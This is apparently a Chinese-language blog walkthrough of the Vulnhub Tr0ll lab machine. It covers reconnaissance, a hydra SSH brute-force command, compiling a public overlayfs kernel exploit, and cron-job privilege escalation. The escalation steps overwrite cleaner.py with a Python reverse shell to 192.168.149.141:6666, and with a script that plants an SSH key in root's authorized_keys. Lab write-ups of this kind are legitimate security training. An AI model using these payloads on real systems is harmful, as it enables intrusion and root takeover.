【Vulnhub】Tr0ll

2020-07-01 16:06:45 浏览数 (1)
nmap 扫一下端口:

nmap -p- -A 192.168.149.174

访问一下 80 端口,只有一张图片

访问了一下 robots.txt 得到了一个 /secret 目录

去访问一下仍然只有一张图片

之前 nmap 扫端口的时候,说了可以匿名登录 ftp

以及还有个流量包 lol.pcap

直接连接上去

从这个流量包里面拿到了 ftp 的一组用户名和密码 anonymous/password

还有这样一组信息

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-Pn

去访问一下目录试试

这竟然是一个 ELF 文件,执行一下试试

又得到一个路径 0x0856BF,再去访问一下

good_luck 目录中有个 txt,作为用户名

this_folder_contains_the_password 目录中有个 pass.txt

然而这个文件名就是 password

爆破一下 ssh

代码语言:javascript复制
hydra -L user.txt -w 10 -P pass.txt -t 10 -v 192.168.149.174 ssh
-L user.txt    指定爆破账号字典为 user.txt
-w 10          设置最大超时时间10s,默认30s
-P pass.txt    指定密码字典为 pass.txt
-t 10          指定爆破线程为 10 个
-v             指定显示爆破过程

拿到一对:overflow/Pass.txt

有几种提权方法:

overlayfs本地提权

查看内核版本:uname -a

直接搜一下提权的脚本

复制出来

代码语言:javascript复制
cp /usr/share/exploitdb/exploits/linux/local/37292.c hack.c

在目标机器上复制上,然后编译好

代码语言:javascript复制
gcc hack.c -o hack
代码语言:javascript复制

./hack 就拿到了 root 权限

反弹shell提权

连上之后发现过一段时间就会断开,系统有个计划任务,查找一下日志

代码语言:javascript复制
cat /var/log/cronlog

发现是一个 cleaner.py 的文件,find 查找一下

内容如下

把他改一下,改成

代码语言:javascript复制
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.149.141",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
#用https://krober.biz/misc/reverse_shell.php生成的
代码语言:javascript复制

覆盖ssh提权

先在 kali 上生成公钥

然后查看一下,把这个复制出来

然后再把那个 cleaner.py 给写为:

代码语言:javascript复制
#!/usr/bin/env python
import os
import sys
try:
    os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDGfjWcCnu2Mi8Op LBy3HoDYYAaiOoNhfA9W0TMO6kjCvYhjBp62xzu7tWAbm9 EPGLzZ6AmDG0znEyEVpHFgk5dWOak4VYkDX50FXbRPshgQZY4c9RfbNA3Th7dSuFo8m7rWNbMkqxC5KBnTjkek7d20uI3CBPIdRFmjg8cD03Q62DMaxbuE0tIF5nUK65ubltt5blRlWsSKBiELerk7q6Ru5qUnOIjfmefwzFfgvH7QeRT7bZyttytVcG7PqlKXL/Sh2oEOTcgYJmOqWuKaDJqXiY5/9XVEMm nF4Y19ytAgHNquDv5RUgAC1 5gNaG/gCtaYRxoZbRy1JcFzM5EQ0RK37kEO6mTm AzRzwvEew2h Byci1/jffI5OuqM6QFLnaUq/Kxb2yWf7l6Bwfq nI1kM7n8YPdGF2jL06V2Teo yUewnGCDbcvhNXm4ryi66vYJfXmNz668dAISYI/821 i/eRKQO5Sv8Eje2a4Y136etzIwQYWaHpYuhwSQc= root@yichen" >> /root/.ssh/authorized_keys')
except:
    sys.exit()
代码语言:javascript复制

要记得把 id_rsa 复制到 /root/.ssh/ 这里

还有很多,但都是用那个脚本配合的

参考:

https://blog.csdn.net/weixin_44214107/article/details/100742919

ssh ftp python 费用中心

0 人点赞